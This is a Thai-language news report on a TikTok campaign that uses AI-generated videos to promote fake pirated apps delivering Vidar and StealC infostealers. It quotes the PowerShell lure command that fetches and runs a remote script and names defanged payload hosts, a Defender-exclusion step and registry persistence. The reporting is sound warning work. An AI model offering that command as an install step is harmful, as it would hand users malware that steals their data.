ระวัง คลิป TikTok แนะนำซอฟต์แวร์เถื่อน ลวงเหยื่อดาวน์โหลดมัลแวร์

ปัจจุบัน TikTok ได้กลายเป็นแหล่งข้อมูลยอดนิยม เนื่องจากข้อมูลมักมาในรูปแบบวิดีโอที่เพลิดเพลิน เข้าถึงได้ง่าย แต่ข้อมูลส่วนมากมักยังไม่ถูกกลั่นกรอง และมักถูกสงสัยในคุณภาพรวมทั้งความถูกต้องของข้อมูล ด้วยความนิยมนี้เอง ทำให้ช่องทางนี้เป็นอีกช่องทางหนึ่งที่แฮกเกอร์ได้นำมาใช้งาน

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญการหลอกลวงครั้งใหม่ของแฮกเกอร์ผ่านทางช่อง TikTok ด้วยการโปรโมตแอปพลิเคชันเถื่อนเพื่อหลอกปล่อยมัลแวร์ลงเครื่องของเหยื่อ ซึ่งการตรวจพบดังกล่าวนั้นเป็นผลงานของทีมวิจัยจาก Trend Micro บริษัทนักพัฒนาซอฟต์แวร์แอนตี้ไวรัสชื่อดัง

โดยแคมเปญดังกล่าวนั้น แฮกเกอร์จะใช้คลิปที่ถูกสร้างขึ้นด้วย AI เพื่อโปรโมตแอปพลิเคชันเถื่อนที่อ้าวชื่อเป็นแอปพลิเคชันยอดนิยม เช่น Windows, Microsoft Office, CapCut, และ Spotify ผ่านทางช่องที่มีชื่อว่า @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, และ @digitaldreams771 เป็นต้น ซึ่งแท้จริงแล้วแอปพลิเคชันเหล่านั้นกลับเป็นมัลแวร์สำหรับขโมยข้อมูลจากเครื่องของเหยื่อ หรือ Infostealer ที่มีชื่อว่า Vidar และ StealC

ซึ่งขั้นตอนในการจู่โจมเหยื่อนั้น แฮกเกอร์จะหลอกให้เหยื่อเปิดฟีเจอร์สำหรับการรันสคริปท์ PowerShell ขึ้นมา แล้วให้พิมพ์คำสั่งโดยอ้างว่าจะเป็นการดาวน์โหลดซอฟต์แวร์ลงมาบนเครื่อง ซึ่งจากตัวอย่างนี้จะเป็นการหลอกในดาวน์โหลดซอฟต์แวร์ Spotify ปลอม โดยแฮกเกอร์จะหลอกให้เหยื่อพิมพ์คำสั่งลงไปว่า

iex (irm hxxps://allaivo[.]me/spotify)

โดยหลังพิมพ์แล้วกดรันคำสั่งแล้ว จะนำไปสู่การสร้างโฟลเดอร์ภายในโฟลเดอร์ APPDATA และ LOCALAPPDATA บนเครื่องของเหยื่อ และเพิ่มโฟลเดอร์เหล่านี้ลงไปยังรายชื่อยกเว้น (Exclusion List) ของ Windows Defender เพื่อหลบเลี่ยงการตรวจจับ หลังจากนั้นจึงดาวน์โหลดไฟล์มัลแวร์ตัวจริง (Payload) จาก hxxps://amssh[.]co/file.exe ลงมา หลังจากติดตั้งมัลแวร์เสร็จ ตัวมัลแวร์ก็จะทำการติดต่อกับเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) เพื่อรับคำสั่งในการปฏิบัติการต่อไป ซึ่งนอกจากการติดตั้งมัลแวร์แล้ว ตัวสคริปท์ตัวแรกยังทำการดาวน์โหลดสคริปท์ PowerShell อีกตัวลงมาจาก hxxps://amssh[.]co/script[.]ps1 เพื่อใช้ในการสร้างความคงทนบนระบบ (Persistence) ด้วยการใช้สคริปท์แก้ไข Registry เพื่อที่จะได้มั่นใจได้ว่ามัลแวร์จะรันตัวเองทุกครั้งเมื่อเปิดเครื่อง

ภาพจาก: https://cybersecuritynews.com/beware-of-trending-tiktok-videos-that-promotes-pirated-apps/

สำหรับในส่วนวิดีโอหลอกลวงนั้น ด้วยการทำงานของ TikTok ที่ช่วยให้วิดีโอเข้าถึงผู้คนได้งาน ทางทีมวิจัยได้พบว่า มีผู้รับชมวิดีโอหลอกลวงดังกล่าวมากกว่า 5 แสนราย และมีผู้กดไลก์มากกว่า 2 หมื่นรายต่อคลิป ทำให้คาดว่าน่าจะมีผู้ตกเป็นเหยื่อ หรืออยู่ภายใต้ความเสี่ยงเป็นจำนวนมาก แต่ก็ยังมีข่าวดีก็คือ บัญชีหลอกลวงที่ทางทีมวิจัยเปิดเผยมาทั้งหมดนั้นได้ถูกทาง TikTok ปิด และลบบัญชีทิ้งไปเป็นที่เรียบร้อยแล้ว แต่ก็ยังคงไม่มีหลักประกันที่ว่าการโจมตีระลอกนี้จะสิ้นสุดลงแต่อย่างใด ดังนั้นขอให้ผู้ใช้งานมีความระมัดระวังตัวเอง โดยอย่าเชื่อคลิป และทำตามคำสั่ง